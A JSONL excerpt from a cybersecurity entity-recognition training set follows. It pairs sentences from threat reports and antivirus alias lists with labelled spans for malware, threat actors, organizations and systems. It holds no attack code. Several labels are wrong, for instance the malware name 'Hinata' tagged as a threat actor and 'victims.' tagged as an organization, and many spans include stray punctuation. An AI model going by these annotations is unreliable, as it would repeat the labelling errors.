{"text": "To distribute the malicious excel file, the attackers registered a domain which impersonated the identity of most influential Indian think tank IDSA Institute for Defence Studies and Analyses and used the email id from the impersonating domain to send out the spear-phishing emails to the victims.", "spans": {"THREAT_ACTOR: attackers": [[44, 53]], "ORGANIZATION: think tank IDSA Institute for Defence Studies and Analyses": [[133, 191]], "ORGANIZATION: victims.": [[289, 297]]}, "info": {"id": "cyner2_train_007139", "source": "cyner2_train"}}
{"text": "The malware appears to have been named Hinata by the malware author after a character from the popular anime series, Naruto.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: Hinata": [[39, 45]], "THREAT_ACTOR: the malware author": [[49, 67]]}, "info": {"id": "cyner2_train_007142", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9964 Infostealer.Gampass Trojan-GameThief.Win32.OnLineGames.jez Trojan.Win32.OnLineGames.csyqf Trojan.PWS.Gamania.6047 BehavesLike.Win32.BadFile.lc Trojan-PWS.OnlineGames Trojan/PSW.OnLineGames.cqju Win32.PSWTroj.OnLineGames.kcloud Trojan-GameThief.Win32.OnLineGames.jez Trojan/Win32.OnlineGameHack.R6228 TScope.Malware-Cryptor.SB Win32/PSW.OnLineGames.HCV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007144", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Bck/DSNX.05 Bloodhound.Morphine Trojan.Packed-86 Backdoor.Win32.DSNX.05.a Backdoor.Dsnx.05.A Backdoor.Win32.DSNX.05.a Backdoor:Win32/DSNX.E Backdoor.DSNX.05.a BackDoor.Dsnx Backdoor.DSNX.05 Bck/DSNX.05 Trojan.Dsnx Trojan-Spy.Win32.Flux.a Win32/DSNX.05 Bck/DSNX.05", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007145", "source": "cyner2_train"}}
{"text": "In July 2014, Trend Micro published a report about a threat called Retefe, an ebanking Trojan that is targeting financial institutions in Switzerland, Austria, Sweden and Japan.", "spans": {"ORGANIZATION: Trend Micro": [[14, 25]], "MALWARE: Retefe,": [[67, 74]], "MALWARE: ebanking Trojan": [[78, 93]], "ORGANIZATION: financial institutions": [[112, 134]]}, "info": {"id": "cyner2_train_007147", "source": "cyner2_train"}}
{"text": "Based on other public reports, SANs saw the expected Qakbot activity.", "spans": {"ORGANIZATION: SANs": [[31, 35]], "MALWARE: Qakbot": [[53, 59]]}, "info": {"id": "cyner2_train_007148", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Regin.A Trojan.Regin Backdoor.Regin.A Trojan/Downloader.Tiny.br Backdoor.Regin.A W32/Backdoor.NAZD-1177 Backdoor.Regin Backdoor.Regin.A Backdoor.Regin.A Backdoor.Regin.A Heur.Packed.Unknown Backdoor.Regin.A Virus.Win32.Dion.b TR/Regin.qzqib Trojan:WinNT/Regin.A!dha Trj/CI.A Win32/Trojan.2d3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007149", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Paycrack Trojan/Hacktool.PayCrack.a W32/Trojan.TVD Win32/HackTool.PayCrack.A HackTool.Win32.PayCrack.a Riskware.Win32.PayCrack.hsmb Win32.Hacktool.Paycrack.Amwe Application.Win32.HackTool.PayCrack.A Tool.PayCrack.Win32.1 W32/Trojan.IFEJ-8553 HackTool.PayCrack.a Malware_fam.gw HackTool/Win32.PayCrack Win32.HackTool.PayCrack.a.kcloud Trojan.Kazy.D2127B HackTool.W32.PayCrack.a!c HackTool.Win32.PayCrack.a HackTool:Win32/Paycrack.A Trojan.VBRA.03914 HackTool.PayCrack!/HSSYr26Jv4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007150", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Rootkit.13224.C Win32.Trojan.KillAV.aa Trojan.Win32.NtRootKit.crkykj Trojan.NtRootKit.12298 Trojan.Zusy.75 Trojan:WinNT/Kernelpatch.A Trojan.Win32.KillAV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007151", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Mariofev Dropper.Drooptroop.Win32.3960 Trojan/Dropper.Drooptroop.jqh Trojan.TDss.50 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/MalwareF.QVRD TROJ_DROPPER.OFB Trojan.Win32.Drooptroop.cphrc Backdoor.Win32.Shiz.A Trojan.DownLoader1.42134 TROJ_DROPPER.OFB BehavesLike.Win32.Ramnit.mc W32/Risk.VWDX-4897 TrojanDropper.Drooptroop.cvo W32.Malware.Downloader TrojanDownloader:Win32/Mariofev.B Win-Trojan/Drooptroop.29184 Trojan.SB.01742 Trj/Sinowal.WXO Win32.Trojan-dropper.Drooptroop.Suxo Trojan.DR.Drooptroop!YuxRFC8vqfA Win32/Trojan.Downloader.5d7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007152", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.6E94 Dropped:Backdoor.Hupigon.AACP Backdoor.Delf.13917 Backdoor.Delf.Win32.18733 Trojan/Ceckno.nag Backdoor.Hupigon.AACP Win32.Trojan.Hupigon.b Win.Trojan.Crypted-5 Backdoor.Win32.Delf.cxe Dropped:Backdoor.Hupigon.AACP Trojan.Win32.Delf.ivaq Backdoor.W32.Delf.lqj!c Win32.Backdoor.Delf.Lkxm Dropped:Backdoor.Hupigon.AACP Packed.Win32.Klone.~KE Dropped:Backdoor.Hupigon.AACP BackDoor.Beizhu.origin Trojan.Win32.Cosmu VirTool.MaskPE.f Trojan[Backdoor]/Win32.Delf PWS:Win32/Populf.E!dll Dropped:Backdoor.Hupigon.AACP Backdoor/Win32.Delf.C195770 Dropped:Backdoor.Hupigon.AACP TScope.Trojan.Delf Backdoor.Delf!JSU0HMDt5JA W32/PEMask.A!tr Win32/Backdoor.Hupigon.88a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007153", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Tosct BKDR_WEBRV.A Win32.Trojan.WisdomEyes.16070401.9500.9995 BKDR_WEBRV.A W32/Trojan.FUQN-2612 W32.Trojan.Downloader Trojan.Heur.RP.EBE28B Backdoor:Win32/Tosct.A W32/Dloader.GQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007154", "source": "cyner2_train"}}
{"text": "The spam messages we observed used several different tactics to deliver malicious payloads to users, including macros, packager shell objects aka OLE objects, and links.", "spans": {"MALWARE: malicious payloads": [[72, 90]], "MALWARE: macros, packager shell objects": [[111, 141]]}, "info": {"id": "cyner2_train_007155", "source": "cyner2_train"}}
{"text": "In this blog we begin with data from a real attack in the wild, and use the evidence from that attack to make a connection back to underground forums and the actors who are using them.", "spans": {"THREAT_ACTOR: underground forums": [[131, 149]], "THREAT_ACTOR: actors": [[158, 164]]}, "info": {"id": "cyner2_train_007156", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Gatt.A Backdoor.Small.oo Backdoor/Small.oo W32/Trojan.AVEH Infostealer.Onlinegame BKDR_SMALL.ALN Trojan.Downloader-17400 Backdoor.Win32.Small.oo Trojan.Gatt.A Trojan.Win32.Veslorn!IK Trojan.Gatt.A DDoS.Bonke BKDR_SMALL.ALN W32/Trojan.AVEH Trojan.Gatt.A Win-Trojan/Xema.variant Backdoor.Win32.Small.oo Trojan-PSW.Onlinegame Backdoor.Pina.k Trojan.Win32.Veslorn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007158", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.KillProc.33379 Trojan.Foreign.Win32.54666 Trojan[Ransom]/Win32.Foreign TrojanDropper:Win32/Rovnix.N W32/Kryptik.DDLY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007160", "source": "cyner2_train"}}
{"text": "He told Amnesty International: one of my colleagues called me…and said I received an email from you and you're mentioning something about political prisoners and there is an attachment there.", "spans": {"ORGANIZATION: Amnesty International:": [[8, 30]], "ORGANIZATION: colleagues": [[41, 51]]}, "info": {"id": "cyner2_train_007161", "source": "cyner2_train"}}
{"text": "In the summer of 2015, Fidelis Cybersecurity had the opportunity to analyze a Derusbi malware sample used as part", "spans": {"ORGANIZATION: Fidelis Cybersecurity": [[23, 44]], "MALWARE: Derusbi malware": [[78, 93]]}, "info": {"id": "cyner2_train_007163", "source": "cyner2_train"}}
{"text": "Recent samples are shown to infect Windows hosts with the NetSupport Manager remote access tool RAT.", "spans": {"SYSTEM: Windows hosts": [[35, 48]], "MALWARE: the NetSupport Manager remote access tool RAT.": [[54, 100]]}, "info": {"id": "cyner2_train_007165", "source": "cyner2_train"}}
{"text": "Tracking Subaat: Targeted Phishing Attacks Point Leader to Threat Actor's Repository", "spans": {"MALWARE: Subaat:": [[9, 16]], "THREAT_ACTOR: Threat Actor's": [[59, 73]]}, "info": {"id": "cyner2_train_007168", "source": "cyner2_train"}}
{"text": "Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear.", "spans": {"THREAT_ACTOR: campaigns: PLEAD, Shrouded Crossbow,": [[156, 192]], "THREAT_ACTOR: Waterbear.": [[206, 216]]}, "info": {"id": "cyner2_train_007169", "source": "cyner2_train"}}
{"text": "Following the seemingly quiet state of point-of-sale PoS malware these past few months, we are now faced with two new PoS malware named Katrina and CenterPoS now available to cybercriminals.", "spans": {"MALWARE: point-of-sale PoS malware": [[39, 64]], "MALWARE: PoS malware": [[118, 129]], "MALWARE: Katrina": [[136, 143]], "MALWARE: CenterPoS": [[148, 157]], "THREAT_ACTOR: cybercriminals.": [[175, 190]]}, "info": {"id": "cyner2_train_007170", "source": "cyner2_train"}}
{"text": "We recently wrote about the KONNI Remote Access Trojan RAT which has been distributed by a small number of campaigns over the past 3 years.", "spans": {"MALWARE: KONNI Remote Access Trojan RAT": [[28, 58]], "THREAT_ACTOR: campaigns": [[107, 116]]}, "info": {"id": "cyner2_train_007171", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Virut.G W32/Virut.CF_2 Win32/Virut.17408 PE_VIRUX.F-1 Virus.Win32.Virut.ce Win32.Virut.AL Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.F-1 Win32/Virut.bn Trojan:Win32/Ertfor.A Virus.Virut.06 HeurEngine.MaliciousPacker Win32/Virut.NBP W32/PackTDss.W!tr W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007172", "source": "cyner2_train"}}
{"text": "During our research into a widespread spam campaign, we discovered yet another POS malware that we've named NitlovePOS.", "spans": {"THREAT_ACTOR: spam campaign,": [[38, 52]], "MALWARE: POS malware": [[79, 90]], "MALWARE: NitlovePOS.": [[108, 119]]}, "info": {"id": "cyner2_train_007173", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.VB!O W32/Autorun.worm.aba Win32.Trojan.WisdomEyes.16070401.9500.9993 W32.SillyFDC Trojan-Dropper.Win32.Dapato.ddfx Trojan.Win32.Dapato.efldrk Win32.HLLW.Autoruner.10315 Worm.VB.Win32.2517 W32/Autorun.worm.aba Worm.Win32.VB Worm/VB.pfc W32.Worm.Sphr Worm/Win32.VB Worm.VB.kcloud Worm:Win32/Dashvolex.A Trojan.Strictor.DCDB Trojan-Dropper.Win32.Dapato.ddfx Worm/Win32.VB.C95007 Trojan.VBO.014708 Worm.VB!8247fVrcIiA W32/VB.OAN!tr Win32/Trojan.Dropper.d0e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007174", "source": "cyner2_train"}}
{"text": "The Carbanak group is infamous for infiltrating various financial institutions, and stealing millions of dollars by learning and abusing the internals of victim payment processing networks, ATM networks and transaction systems.", "spans": {"THREAT_ACTOR: The Carbanak group": [[0, 18]], "ORGANIZATION: financial institutions,": [[56, 79]], "SYSTEM: ATM networks": [[190, 202]], "SYSTEM: transaction systems.": [[207, 227]]}, "info": {"id": "cyner2_train_007175", "source": "cyner2_train"}}
{"text": "This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming MuddyWater", "spans": {"THREAT_ACTOR: group": [[113, 118]], "ORGANIZATION: Unit 42": [[119, 126]], "MALWARE: MuddyWater": [[137, 147]]}, "info": {"id": "cyner2_train_007176", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Dtr.1.4.4 Backdoor.DTR BackDoor-WF.svr.rmv Email-Worm.Win32.GOPworm.196 Backdoor.Dtr.1.4.4 W32/Risk.RVZV-3966 Backdoor.Trojan Win32/DTR.14.rmvr BKDR_WF.SVR Backdoor.Dtr.1.4.4 Backdoor.Dtr.1.4.4 Trojan.Win32.Dtr.zmvuu Backdoor.Dtr.1.4.4 Backdoor.Win32.DTR.14.rmvr BackDoor.Dtr.143 Backdoor.Win32.C01A9ACD BackDoor-WF.svr.rmv W32.DTR.B BDS/Dtr.1.4.4 Backdoor:Win32/DTR.B Backdoor.Dtr.1.4.4 Email-Worm.Win32.GOPworm.196 Win32.Trojan.Wf.Pefg Backdoor.WF!ynwdN87+ujc Trojan.Win32.DTR W32/Bdoor.WH!tr.bdr Win32/Backdoor.9a4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007177", "source": "cyner2_train"}}
{"text": "In this attack, AutoIT was utilized to install a Remote Access Trojan RAT and maintain persistence on the host in a manner that's similar to normal administration activity.", "spans": {"MALWARE: AutoIT": [[16, 22]], "MALWARE: a Remote Access Trojan RAT": [[47, 73]]}, "info": {"id": "cyner2_train_007178", "source": "cyner2_train"}}
{"text": "This report contained a sentence of particular interest to Cyber4Sight: FIN7 is referred to by many vendors as Carbanak Group,' although we do not equate all usage of the Carbanak backdoor with FIN7. In their previous report on this threat actor group, FireEye stopped short of making this direct connection, stating instead that The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.", "spans": {"THREAT_ACTOR: Cyber4Sight: FIN7": [[59, 76]], "THREAT_ACTOR: Carbanak Group,'": [[111, 127]], "MALWARE: the Carbanak backdoor": [[167, 188]], "THREAT_ACTOR: FIN7.": [[194, 199]], "THREAT_ACTOR: threat actor group,": [[233, 252]], "ORGANIZATION: FireEye": [[253, 260]], "MALWARE: CARBANAK malware": [[345, 361]], "THREAT_ACTOR: FIN7 operations": [[365, 380]], "THREAT_ACTOR: campaigns": [[423, 432]], "THREAT_ACTOR: CARBANAK operations": [[467, 486]]}, "info": {"id": "cyner2_train_007179", "source": "cyner2_train"}}
{"text": "UNIX-based operating systems are widely used in servers, workstations, and even mobile devices.", "spans": {"SYSTEM: UNIX-based operating systems": [[0, 28]], "SYSTEM: servers, workstations,": [[48, 70]], "SYSTEM: mobile devices.": [[80, 95]]}, "info": {"id": "cyner2_train_007180", "source": "cyner2_train"}}
{"text": "I.e., malicious email messages are sent to selected targets rather than random mass distribution, but are not tailored specifically to each and every target.", "spans": {}, "info": {"id": "cyner2_train_007181", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.AutoDoor!O Worm.AutoDoor Trojan.Win32.Buzus Win32.Trojan.WisdomEyes.16070401.9500.9827 W32/Trojan2.CWJR W32.IRCBot Win32/DfInject.CI TROJ_BUZUS.JW Win.Trojan.Buzus-2971 Worm.Win32.AutoDoor.fd Trojan.Win32.Buzus.qvdn Trojan.Win32.Buzus.48128 TrojWare.Win32.Buzus.~BAAM Trojan.MulDrop.27694 Trojan.Buzus.Win32.5559 TROJ_BUZUS.JW BehavesLike.Win32.Worm.cz Trojan/Buzus.esq Trojan/Win32.Buzus Trojan:Win32/Buzus.A Worm.Win32.AutoDoor.fd Trojan/Win32.Buzus.C140550 Trojan.Win32.Buzus.ck Trojan.Win32.Buzus Trj/Buzus.ER Virus.Win32.Virut.ue Worm.Win32.AutoDoor W32/Injector.fam!tr Win32/Worm.07d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007182", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Mintluks.FC.1419 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Inject.dhybnf Trojan.DownLoader11.61306 PWS:MSIL/Mintluks.A Trojan.Razy.D2D0CD MSIL.Trojan.Injector.HD Backdoor.Bot Trojan.MSIL.Injector Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007187", "source": "cyner2_train"}}
{"text": "The Patchwork attack group has been targeting more than just government-associated organizations.", "spans": {"ORGANIZATION: government-associated organizations.": [[61, 97]]}, "info": {"id": "cyner2_train_007188", "source": "cyner2_train"}}
{"text": "It is usually used as a downloader for the actual binary payload.", "spans": {"MALWARE: downloader": [[24, 34]], "MALWARE: the actual binary payload.": [[39, 65]]}, "info": {"id": "cyner2_train_007189", "source": "cyner2_train"}}
{"text": "However, over a period of just over two weeks June 10 to June 28, we saw a recurrence of this threat.", "spans": {"MALWARE: threat.": [[94, 101]]}, "info": {"id": "cyner2_train_007190", "source": "cyner2_train"}}
{"text": "Hundreds of malware samples have been used, most are Remote Access Trojans and keyloggers.", "spans": {"MALWARE: malware": [[12, 19]], "MALWARE: Remote Access Trojans": [[53, 74]], "MALWARE: keyloggers.": [[79, 90]]}, "info": {"id": "cyner2_train_007191", "source": "cyner2_train"}}
{"text": "The attackers initially injected a malicious user-defined function Downloader.Chikdos into servers in order to compromise them with the Trojan.Chikdos.A DDoS malware According to Symantec telemetry, the majority of the compromised servers are in India, followed by China, Brazil and the Netherlands.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "SYSTEM: servers": [[91, 98]], "MALWARE: DDoS malware": [[153, 165]], "ORGANIZATION: Symantec telemetry,": [[179, 198]], "SYSTEM: compromised servers": [[219, 238]]}, "info": {"id": "cyner2_train_007192", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Retefe W32/Trojan.IYLJ-0833 Ransom.Cry Trojan.Win32.Banker1.euqajf TrojWare.Win32.Amtar.TAW Trojan.PWS.Banker1.23740 Trojan.Adware.a Trojan/Win32.Injector.C2217431 Trj/CI.A Win32.Trojan.Fakeversign.Vgov Win32/Trojan.Adware.37e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007193", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanProxy.Roficor W32/Trojan.GIFJ-9110 Win32/Tnega.TOWATOC TrojanProxy:Win32/Roficor.A Win32.Trojan.Falsesign.Duco", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007194", "source": "cyner2_train"}}
{"text": "Adwind is a Java-based remote access tool RAT used by malware authors to infect computers with backdoor access.", "spans": {"MALWARE: Adwind": [[0, 6]], "MALWARE: Java-based remote access tool RAT": [[12, 45]], "THREAT_ACTOR: malware authors": [[54, 69]], "SYSTEM: computers": [[80, 89]], "MALWARE: backdoor access.": [[95, 111]]}, "info": {"id": "cyner2_train_007195", "source": "cyner2_train"}}
{"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m % d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written in .Net – skype_sync2.exe .", "spans": {"SYSTEM: .Net": [[640, 644]]}, "info": {"id": "cyner2_train_007196", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Scar.995328.O Trojan/Scar.dzrv Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Bayrob Trojan.Win32.Scar.cpddg Troj.W32.Scar.dzrv!c Trojan.Scar.Win32.50507 BehavesLike.Win32.GameVance.dt Trojan/Scar.bagk TR/Woripecs.A.48 Trojan.Heur.JP.EFC713 Backdoor:Win32/Nivdort.A!dll Trojan/Win32.Bayrob.C236811 Trojan.Scar!yb6+goUnDvM Trojan.Win32.Woripecs W32/Scar.AT!tr Win32/Trojan.Spy.84a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007198", "source": "cyner2_train"}}
{"text": "The spreading method of a fake antivirus website was also quite confusing, normally I see these things dropping FakeAV's as I've written on in the past.", "spans": {}, "info": {"id": "cyner2_train_007200", "source": "cyner2_train"}}
{"text": "Some of Regin's custom payloads point to a high level of specialist knowledge in particular sectors, such as telecoms infrastructure software, on the part of the developers.", "spans": {"MALWARE: Regin's custom payloads": [[8, 31]], "ORGANIZATION: telecoms infrastructure software,": [[109, 142]]}, "info": {"id": "cyner2_train_007201", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Tagazie.Trojan Trojan/W32.Small.36864.ACH Trojan.Win32.Scar!O TrojanDownloader.Bredolab.AJ2 Virus.Virut.Win32.1911 Trojan/Scar.eaml Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_SCAR_0000027.TOMA Trojan.Win32.Scar.eaml Trojan.Win32.Scar.djhme Trojan.Win32.Scar.9216.A Trojan.Win32.Scar.eaml Trojan.Proxy.19837 BehavesLike.Win32.PWSZbot.nc Trojan/Scar.airi Trojan/Win32.Scar Trojan:Win32/Hioles.D Troj.W32.Scar.lrnw Trojan.Win32.Scar.eaml Trojan/Win32.Scar.R7877 Worm.Fakeupdate.2821 Win32.Magistr Trojan.Scar!QrzKm85lu1k Trojan.Win32.Comame", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007202", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Script.634117 Trojan.Win32.Miner!O Win32.Trojan.WisdomEyes.16070401.9500.9944 PUA.Deminnix Trojan.Win32.Miner.aau Trojan.Script.634117 Riskware.Win32.BitCoinMiner.csteyy Trojan.Script.634117 Tool.BtcMine.83 Trojan.Miner.Win32.426 W32/Trojan.IJIB-0603 Trojan/Miner.dc Trojan.Graftor.D194A6 Trojan.Win32.Miner.aau Trojan.BitMiner Win32/CoinMiner.EC Riskware.BitCoinMiner!FKk5sgQEcRQ Trojan.Win32.Deminnix", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007203", "source": "cyner2_train"}}
{"text": "The investigations showed that the attacks shared a number of common features, such as involving large amount of monetary loss originating from what initially appeared to be legitimate bank customer accounts.", "spans": {}, "info": {"id": "cyner2_train_007205", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Kimad.19394 Trojan/Downloader.Stantinko.o TROJ_KIMAD_EK04051A.UVPM Win32.Trojan-Downloader.Stantinko.a TROJ_KIMAD_EK04051A.UVPM Win.Trojan.12288703-1 Trojan.Kbdmai.14 Downloader.Stantinko.Win32.10 Trojan-Downloader.Win32.Stantinko Variant.Graftor.eb Trojan.Graftor.D2AB64 Trojan/Win32.Kimad.R138166 Trojan.DL.Stantinko! Win32/Trojan.Stantinko.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007206", "source": "cyner2_train"}}
{"text": "DarkKomet is a freeware remote access trojan that was released by an independent software developer.", "spans": {"MALWARE: DarkKomet": [[0, 9]], "MALWARE: freeware remote access trojan": [[15, 44]], "THREAT_ACTOR: independent software developer.": [[69, 100]]}, "info": {"id": "cyner2_train_007207", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DownloadGelodeA.Trojan Adware.WSearch.Win32.494 TROJ_RUGO.SM Win32.Trojan.WisdomEyes.16070401.9500.9989 TROJ_RUGO.SM Trojan.Win32.Dwn.vrhnq Trojan.DownLoader5.16461 TR/Graftor.16274.28 Trojan/Win32.Unknown TrojanDownloader:Win32/Nekotimed.A Trojan.Graftor.D3F92 Downloader/Win32.Nekill.R1661 Adware.WSearch!QcX4Awfq1EM Trojan-Downloader.Win32.Adnur", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007209", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.163 Trojan.FTKN-6 Doc.Macro.Injection-6355574-0 VB:Trojan.Valyria.163 Troj.Downloader.Script!c VB:Trojan.Valyria.163 W97M.DownLoader.631 VB:Trojan.Valyria.163 VB:Trojan.Valyria.163 Win32.Outbreak VB:Trojan.Valyria.163 virus.office.qexvmc.1070", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007210", "source": "cyner2_train"}}
{"text": "The effectiveness of a zero-day quickly deteriorates as an attack tool after it gets discovered and patched by the affected software vendors.", "spans": {"VULNERABILITY: zero-day": [[23, 31]], "MALWARE: attack tool": [[59, 70]], "ORGANIZATION: software vendors.": [[124, 141]]}, "info": {"id": "cyner2_train_007211", "source": "cyner2_train"}}
{"text": "Small businesses are generally more likely to use remote administration software for their POS terminals so that 3rd parties can manage the terminals.", "spans": {"ORGANIZATION: Small businesses": [[0, 16]], "SYSTEM: remote administration software": [[50, 80]], "SYSTEM: POS terminals": [[91, 104]]}, "info": {"id": "cyner2_train_007212", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Nurjax TROJ_GE.273CBA41 Trojan.Win32.Nurjax.ufm Trojan.Win32.Nurjax.dxmzxe Trojan.Win32.Z.Nurjax.10297344 Troj.W32.Nurjax!c BehavesLike.Win32.Dropper.tc W32/Trojan.TKWG-0004 Trojan.Nurjax.a Trojan/Win32.Nurjax TrojanDownloader:Win32/Lentrigy.A Trojan.Win32.Nurjax.ufm Trj/CI.A Win32.Trojan.Nurjax.Ajbs Trojan.Nurjax! W32/Nurjax.BQZ!tr Win32/Trojan.e9c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007214", "source": "cyner2_train"}}
{"text": "The Fidelis Threat Research team recently analyzed a new variant to Vawtrak using HTTPS for C2 communications.", "spans": {"ORGANIZATION: The Fidelis Threat Research team": [[0, 32]], "MALWARE: variant": [[57, 64]], "MALWARE: Vawtrak": [[68, 75]]}, "info": {"id": "cyner2_train_007215", "source": "cyner2_train"}}
{"text": "These thefts targeted banks in Vietnam, Bangladesh, Taiwan, and Mexico between 2016 and 2017.", "spans": {"ORGANIZATION: banks": [[22, 27]]}, "info": {"id": "cyner2_train_007218", "source": "cyner2_train"}}
{"text": "North Korea conducted a test missile launch on 3rd July.", "spans": {}, "info": {"id": "cyner2_train_007219", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Hacktool.BruteForce.mp Win32.Trojan.WisdomEyes.16070401.9500.9985 Win.Trojan.Hacktool-315 Trojan.Win32.BruteForce.recrn Tool.Bruteforce.84 Tool.BruteForce.Win32.143 HTool.BruteForce.g", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007220", "source": "cyner2_train"}}
{"text": "In order to ensure we have the most effective detection possible, Talos reverse engineered CryptoWall 4 to better understand its execution, behavior, deltas from previous versions and share our research and findings with the community.", "spans": {"ORGANIZATION: Talos": [[66, 71]], "MALWARE: CryptoWall 4": [[91, 103]], "ORGANIZATION: community.": [[225, 235]]}, "info": {"id": "cyner2_train_007222", "source": "cyner2_train"}}
{"text": "We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation.", "spans": {"ORGANIZATION: Dropbox": [[21, 28]], "MALWARE: threat,": [[48, 55]], "ORGANIZATION: cooperation": [[64, 75]]}, "info": {"id": "cyner2_train_007223", "source": "cyner2_train"}}
{"text": "PluginPhantom implements each element of malicious functionality as a plugin, and utilizes a host app to control the plugins.", "spans": {"MALWARE: PluginPhantom": [[0, 13]], "MALWARE: malicious functionality": [[41, 64]], "SYSTEM: plugin,": [[70, 77]], "SYSTEM: host app": [[93, 101]]}, "info": {"id": "cyner2_train_007230", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Byterage.8193 Trojan/Downloader.Byterage Trojan.Win32.Byterage.hipq W32/Downloader.HPW Byterage.C TROJ_EXCEPTION.F Trojan-Downloader.Win32.Byterage Trojan.Byterage.A Trojan.Win32.Downloader.8193 Virus.Win32.Part.k TrojWare.Win32.TrojanDownloader.Byterage Trojan.Duho TR/Byterage.Dldr TROJ_EXCEPTION.F TrojanDownloader.Win32.Byterage Trojan/Win32.Byterage Win32.Troj.DownByteage.kcloud W32/Downloader.KOEY-6366 Win-Trojan/Byterage.8193 Malware-Cryptor.InstallCore.1 Win32/TrojanDownloader.Byterage Trojan.DL.Byterage Trojan-Downloader.Win32.Small W32/Dloader.AW!tr Downloader.Byterage", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007231", "source": "cyner2_train"}}
{"text": "In addition, thanks to a coding mistake by the attackers, this particular backdoor does not always run the right commands.", "spans": {"VULNERABILITY: coding mistake": [[25, 39]], "THREAT_ACTOR: attackers,": [[47, 57]], "MALWARE: backdoor": [[74, 82]]}, "info": {"id": "cyner2_train_007232", "source": "cyner2_train"}}
